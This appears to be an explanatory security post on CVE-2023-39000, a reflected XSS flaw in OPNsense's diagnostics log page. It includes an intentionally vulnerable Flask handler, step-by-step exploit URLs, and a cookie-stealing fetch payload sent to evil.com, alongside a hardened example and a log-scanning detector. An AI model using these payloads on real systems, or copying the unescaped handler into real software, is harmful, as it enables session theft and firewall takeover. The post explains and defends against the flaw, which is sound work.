CVE-2023-39000 - Reflected XSS in OPNsense /ui/diagnostics/log/core/ - Explained with Example, Analysis, and Exploit Details

In July 2023, a security flaw was disclosed in OPNsense, a popular open-source firewall and routing platform. The issue, tracked as CVE-2023-39000, is a reflected Cross-Site Scripting (XSS) bug in the /ui/diagnostics/log/core/ component and affects OPNsense versions before 23.7. A successful attack lets an attacker run JavaScript in the browser of anyone who opens a specially crafted link; if that person is logged into the firewall's web interface, the script runs with their session and can act on the management interface itself.

In this post, we'll break down what this bug is, look at some illustrative code, and walk step by step through how an attack works, all in straightforward language.

Reflected XSS is a common web security issue. Here's how it works in basic terms:

- A website takes something from the request (a query string parameter or a path segment) and echoes it back into the page without checking or encoding it.

- An attacker builds a link whose URL carries HTML and JavaScript in that spot and gets a victim to open it.

- The script runs in the victim's browser as if it came from the trusted website, in that site's origin.

- Result: the attacker can read cookies that are not HttpOnly, perform actions as the victim, deface pages, or hijack accounts.

In OPNsense, the web management console has a diagnostics page under the path

/ui/diagnostics/log/core/

Versions before 23.7 did not properly sanitize or encode the user-supplied input that this component reflects into its response.

What goes wrong?

If someone puts HTML containing JavaScript into the URL path, OPNsense reflects it into the server response without encoding it. The victim's browser parses that reflected markup as part of the page and executes the script.

How did it happen?

In the affected code, part of the request path is written back into the page (presumably to label what is being viewed), but it is not HTML-escaped on the way out, so tags and event-handler attributes in that path are rendered as live markup.

Vulnerable URL

Any request to /ui/diagnostics/log/core/<payload> where <payload> is attacker-controlled input can trigger the bug.

https://<opnsense-server>/ui/diagnostics/log/core/<img src=x onerror=alert(1)>

The image source x fails to load, so the onerror handler fires and the browser runs alert(1). When the link is opened, the browser percent-encodes the spaces and angle brackets on the wire; the server decodes them again before reflecting the value, so the payload arrives intact.

If the attacker puts more sophisticated code (like stealing cookies), things get worse.

Let’s imagine a simplified Python Flask app with a similar bug

from flask import Flask

app = Flask(__name__)

@app.route('/ui/diagnostics/log/core/<path:log>')
def show_log(log):
    # VULNERABLE: `log` is the URL-decoded path segment and is dropped
    # straight into the HTML body with no escaping, so any markup in the
    # URL becomes markup in the response.
    return f"<html><body>Currently viewing logs: {log}</body></html>"

# Run with: flask run  (Flask picks up the `app` object from this module)

If you visit

http://localhost:5000/ui/diagnostics/log/core/<img src=x onerror=alert(1)>

an alert box pops up. The bug in OPNsense is of a very similar flavor.
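The hardened counterpart to the Flask snippet above, as an added example that is not OPNsense's code or the project's actual fix: the page template and the payloads are the ones from this post, Flask itself is left out so the functions run on their own, render_vulnerable mirrors the handler above, and render_fixed is the corrected form that HTML-encodes the decoded path segment before writing it into the page.

```python
import html
import re
from urllib.parse import unquote

# The payload from this post, and the percent-encoded form a browser
# actually puts on the wire when the link is opened (constructed here).
PAYLOAD = "<img src=x onerror=alert(1)>"
ENCODED_PAYLOAD = "%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"

# Same page template as the Flask handler above.
PREFIX = "<html><body>Currently viewing logs: "
SUFFIX = "</body></html>"


def decode_path_segment(raw_segment: str) -> str:
    """Percent-decode one path segment, as a framework does before calling
    the route handler (Flask's <path:> converter behaves this way). This is
    why '%3Cimg' in the request line arrives in the handler as '<img'."""
    return unquote(raw_segment)


def render_vulnerable(raw_segment: str) -> str:
    """Same behaviour as the vulnerable handler above: the decoded segment
    is concatenated into the HTML body with no output encoding."""
    return PREFIX + decode_path_segment(raw_segment) + SUFFIX


def render_fixed(raw_segment: str) -> str:
    """Hardened form: HTML-encode the value for an HTML text context before
    it is written out. html.escape turns < > & " ' into entities, so the
    browser displays the payload as text instead of parsing it as a tag."""
    return PREFIX + html.escape(decode_path_segment(raw_segment), quote=True) + SUFFIX


def reflected_part(rendered: str) -> str:
    """Return only the reflected value, so the check below does not trip
    on the template's own <html>/<body> tags."""
    return rendered[len(PREFIX):len(rendered) - len(SUFFIX)]


def contains_active_markup(rendered: str) -> bool:
    """Does the reflected value still contain something the HTML parser
    would treat as a tag ('<' followed by a letter, '/' or '!')?"""
    return re.search(r"<[A-Za-z/!]", reflected_part(rendered)) is not None


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        out = render(ENCODED_PAYLOAD)
        print(f"{name:10s} active markup: {contains_active_markup(out)}  {reflected_part(out)}")
```

Encoding is context-specific: html.escape is the right choice for a value placed in HTML body text or a quoted attribute, which is the case for this template. A value placed inside a script block, a URL, or an unquoted attribute needs the encoding for that context instead, so the fix is only correct because of where the template puts the value.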

Exploitation, step by step:

1. Craft a malicious URL (replace the server and port as needed):

https://your-opnsense/ui/diagnostics/log/core/<img src=x onerror=alert('xss')>

2. Get someone who is logged into the OPNsense web interface to open the link.

3. When the link is opened and the server is vulnerable, the alert appears, proving script execution in the victim's browser.

More Malicious Payload

An attacker can use JavaScript to send the victim's cookies or tokens to a server they control (only cookies not flagged HttpOnly are readable from script):

<script>
fetch('https://evil.com/steal?' + document.cookie)
</script>

Injected as

https://your-opnsense/ui/diagnostics/log/core/<script>fetch('https://evil.com/steal%3F'+document.cookie)</script>

The ? inside the payload has to be percent-encoded as %3F in the link: a literal ? would start the query string of the request to OPNsense, and the reflected path segment would end before the cookie is appended. A plus sign in a URL path is a literal plus, so the string concatenation survives decoding.

- Administrative takeover: if the victim is logged in as an administrator, the injected script runs with that session and can drive the management interface. Even when the session cookie is HttpOnly and cannot be read, script running in the page can still issue requests from the victim's browser that carry it, subject to whatever CSRF protection the interface applies.

- Network attack: OPNsense protects critical networks; if its admin panel is compromised, every resource behind it is at risk.
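A detection counterpart, added here and not part of the original post: the function below scans web-server access-log lines for requests to the affected path whose reflected segment decodes to HTML markup, an on*= event handler, or a javascript: URL. The log lines are constructed in Common Log Format for the example and are not real OPNsense logs; the layout of OPNsense's own web-server log is not assumed, so LOG_RE is the part to adapt for a real deployment. The 192.0.2.5 line carries a double-encoded probe (%253C) that a single round of decoding would miss.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (Common Log Format) for this example only.
# Lines 2, 3 and 5 carry XSS probes; line 5 is double-encoded.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2023:10:01:02 +0000] "GET /ui/diagnostics/log/core/system HTTP/1.1" 200 5120
203.0.113.7 - - [10/Aug/2023:10:01:09 +0000] "GET /ui/diagnostics/log/core/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 4870
198.51.100.23 - - [10/Aug/2023:10:02:30 +0000] "GET /ui/diagnostics/log/core/%3Cscript%3Efetch('https://evil.com/steal%3F'%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 4901
203.0.113.7 - - [10/Aug/2023:10:03:00 +0000] "GET /ui/diagnostics/log/core/firewall HTTP/1.1" 200 6011
192.0.2.5 - - [10/Aug/2023:10:04:12 +0000] "GET /ui/diagnostics/log/core/%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E HTTP/1.1" 200 4870
"""

# One CLF entry: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

AFFECTED_PREFIX = "/ui/diagnostics/log/core/"

# Indicators of injected markup: an opening tag, an on*= event-handler
# attribute, or a javascript: URL. Deliberately crude; tune against your
# own traffic before alerting on it.
MARKUP_RE = re.compile(r"<\s*/?[A-Za-z!]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so that a
    double-encoded probe such as %253C is recognised as '<'. Whether or not
    the server would decode it twice, such a request is worth a look."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_probes(log_text: str):
    """Return (ip, status, decoded_segment) for every request to the
    affected path whose reflected segment looks like injected markup.
    The whole request target after the prefix is examined, not only the
    path, so a payload that spills into the query string via a literal
    '?' is still caught."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a CLF request line; skip rather than guess
        target = match["target"]
        if not target.startswith(AFFECTED_PREFIX):
            continue
        segment = fully_decode(target[len(AFFECTED_PREFIX):])
        if MARKUP_RE.search(segment):
            hits.append((match["ip"], match["status"], segment))
    return hits


if __name__ == "__main__":
    for ip, status, segment in find_xss_probes(SAMPLE_LOG):
        print(f"{ip:15s} {status}  {segment}")
```

A 200 status on a flagged line means the server answered the probe normally; on a version before 23.7 that response would have carried the payload back to the browser, so those source addresses and any administrator sessions active at the time deserve follow-up.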

1. Upgrade OPNsense to version 23.7 or later, where the bug is fixed.

2. Do not open links from untrusted sources while logged into firewalls or routers.

References and Further Reading

- CVE-2023-39000 at MITRE
- OPNsense Changelog 23.7
- OWASP XSS Cheat Sheet

Conclusion

CVE-2023-39000 is a classic reminder that the web interface of an infrastructure device should never trust user input. Even a device you rely on for defense, like a firewall, can be turned against you by a simple, overlooked bug. If you run OPNsense, upgrade now, and stay alert for links that lead back into your own management interface.

Timeline

Published on: 08/09/2023 19:15:00 UTC
Last modified on: 08/15/2023 15:08:00 UTC